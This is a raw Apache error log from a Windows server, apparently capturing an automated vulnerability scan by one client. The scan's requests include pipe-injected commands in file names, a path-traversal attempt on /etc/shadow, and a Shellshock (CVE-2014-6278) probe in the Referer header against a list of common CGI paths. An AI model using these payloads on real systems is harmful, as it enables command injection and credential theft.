[Wed Sep 29 15:52:20.690871 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 15:56:12.231478 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 16:14:59.597663 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 16:30:54.395344 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 16:30:55.752546 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 17:49:09.529211 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:07:14.901721 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:08:26.928047 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:10:09.297427 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:11:43.358993 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:14:53.917328 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:17:55.426048 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:21:22.971812 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:24:52.814182 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:28:19.953747 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:32:29.411186 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:40:14.827805 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:43:36.680559 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:47:19.140950 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:47:19.140950 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:51:32.949198 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:54:28.170106 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 18:57:23.705615 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:03:19.720241 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:09:05.420650 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:12:01.018559 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:14:57.131269 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:17:52.344181 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:20:47.474891 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:23:42.993799 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:26:51.475731 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:29:33.844817 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:32:16.969704 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:34:55.905783 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:37:51.206291 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:40:46.303999 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:44:00.387940 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:46:36.594015 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:49:33.370727 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:49:54.369364 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:52:29.233237 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:55:23.785944 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:55:25.345947 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:56:04.643416 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 19:58:19.149253 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:02:39.827112 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:06:40.696535 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:28:23.177028 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:34:23.826461 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:36:16.347860 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 20:40:24.954897 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 21:01:28.827326 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 21:24:03.324710 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 21:27:49.015307 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34904] AH00127: Cannot map GET /E26gyUeP.bat|dir HTTP/1.1 to file
[Wed Sep 29 21:27:49.452108 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34904] script not found or unable to stat: E:/nuevo/htdocs/E26gyUeP.CGI
[Wed Sep 29 21:27:52.041712 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34904] script not found or unable to stat: E:/nuevo/htdocs/E26gyUeP.cgi
[Wed Sep 29 21:27:53.180514 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34904] AH00127: Cannot map GET /E26gyUeP.bas:ShowVolume HTTP/1.1 to file
[Wed Sep 29 21:27:53.632915 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34904] AH00127: Cannot map GET /E26gyUeP.pl|dir HTTP/1.1 to file
[Wed Sep 29 21:27:53.851316 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34904] AH00127: Cannot map GET /E26gyUeP.10:100 HTTP/1.1 to file
[Wed Sep 29 21:27:53.960516 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34904] script not found or unable to stat: E:/nuevo/htdocs/E26gyUeP.ASP
[Wed Sep 29 21:27:57.310323 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34904] AH00127: Cannot map GET /E26gyUeP.exe|dir HTTP/1.1 to file
[Wed Sep 29 21:27:58.995126 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34904] script not found or unable to stat: E:/nuevo/htdocs/E26gyUeP.asp
[Wed Sep 29 21:28:30.163981 2021] [core:error] [pid 10816:tid 21208] (20025)The given path contained wildcard characters: [client 65.94.34.16:34906] AH00036: access to /hXgkKwYc.* failed (filesystem path 'E:/nuevo/htdocs/hXgkKwYc.*')
[Wed Sep 29 21:28:31.224783 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34906] AH00127: Cannot map GET /hXgkKwYc.pl|dir HTTP/1.1 to file
[Wed Sep 29 21:28:35.358790 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/hXgkKwYc.pl
[Wed Sep 29 21:28:37.464794 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/hXgkKwYc.asp
[Wed Sep 29 21:28:38.587996 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34906] AH00127: Cannot map GET /hXgkKwYc.bat|dir HTTP/1.1 to file
[Wed Sep 29 21:28:43.533204 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34906] AH00127: Cannot map GET /hXgkKwYc.exe|dir HTTP/1.1 to file
[Wed Sep 29 21:28:44.094805 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/hXgkKwYc.ASP
[Wed Sep 29 21:28:45.452008 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/hXgkKwYc.CGI
[Wed Sep 29 21:28:47.183611 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34906] AH00127: Cannot map GET /hXgkKwYc.bas:ShowVolume HTTP/1.1 to file
[Wed Sep 29 21:28:50.584417 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/hXgkKwYc.cgi
[Wed Sep 29 21:28:51.504818 2021] [core:error] [pid 10816:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:34906] AH00127: Cannot map GET /hXgkKwYc.10:100 HTTP/1.1 to file
[Wed Sep 29 21:28:57.387029 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] script not found or unable to stat: E:/nuevo/htdocs/cgi.cgi
[Wed Sep 29 21:28:58.167030 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34906] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Wed Sep 29 21:29:22.237872 2021] [negotiation:error] [pid 10816:tid 21208] [client 65.94.34.16:34916] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Wed Sep 29 21:30:05.856549 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34916] script not found or unable to stat: E:/nuevo/htdocs/index.asp
[Wed Sep 29 21:30:05.965749 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34916] script not found or unable to stat: E:/nuevo/htdocs/junk999.asp
[Wed Sep 29 21:30:06.308950 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34916] script not found or unable to stat: E:/nuevo/htdocs/login.asp
[Wed Sep 29 21:30:10.240157 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34916] AH00126: Invalid URI in request GET . HTTP/1.0
[Wed Sep 29 21:30:13.562963 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34950] script not found or unable to stat: E:/nuevo/htdocs/index.cgi
[Wed Sep 29 21:30:13.687763 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34950] script not found or unable to stat: E:/nuevo/htdocs/index.pl
[Wed Sep 29 21:30:13.812563 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34950] script not found or unable to stat: E:/nuevo/htdocs/index.asp
[Wed Sep 29 21:30:14.030963 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34950] script not found or unable to stat: E:/nuevo/htdocs/default.asp
[Wed Sep 29 21:30:16.121367 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34952] AH00135: Invalid method in request TMKVKANV / HTTP/1.1
[Wed Sep 29 21:30:16.355367 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34954] AH00135: Invalid method in request DEBUG / HTTP/1.1
[Wed Sep 29 21:30:16.916968 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34958] AH00135: Invalid method in request TRACK / HTTP/1.0
[Wed Sep 29 21:30:17.137369 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34960] AH00135: Invalid method in request TRACK / HTTP/1.1
[Wed Sep 29 21:30:17.808170 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34962] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/shadow HTTP/1.1
[Wed Sep 29 21:30:18.166971 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] attempt to invoke directory as script: E:/nuevo/cgi-bin/, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.276171 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/admin.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.400971 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/administrator.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.510171 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/authLogin.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.619372 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/bb-hist.sh, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.728572 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/banner.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.837772 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/book.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:18.946972 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/cgiinfo.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.071772 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/cgitest.py, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.180973 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/cgi_wrapper, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.290173 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/contact.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.399373 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/count.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.508573 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/defaultwebpage.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.617773 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/download.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.726974 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/entropysearch.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.851774 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/env.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:19.960974 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/environment.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.070174 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/ezmlm-browse, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.179374 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/formmail.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.288574 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/FormMail-clone.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.397775 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/guestbook.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.506975 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/helpdesk.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.631775 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/index.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.740975 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/index.php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.850175 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/index.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:20.959376 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/info.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.068576 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/info.sh, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.177776 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/loadpage.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.286976 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.411776 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/login.php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.520977 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/login.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.630177 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/pathtest.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.754977 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.864177 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php4, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:21.973377 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php5, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.082578 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php-cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.191778 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.300978 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/php.fcgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.425778 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/printenv, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.534978 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/restore_config.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.644179 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/ruby.rb, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.753379 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/search, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:22.862579 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/search.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.002979 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/server.php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.112179 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.221380 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/sysinfo.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.330580 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.439780 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.548980 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
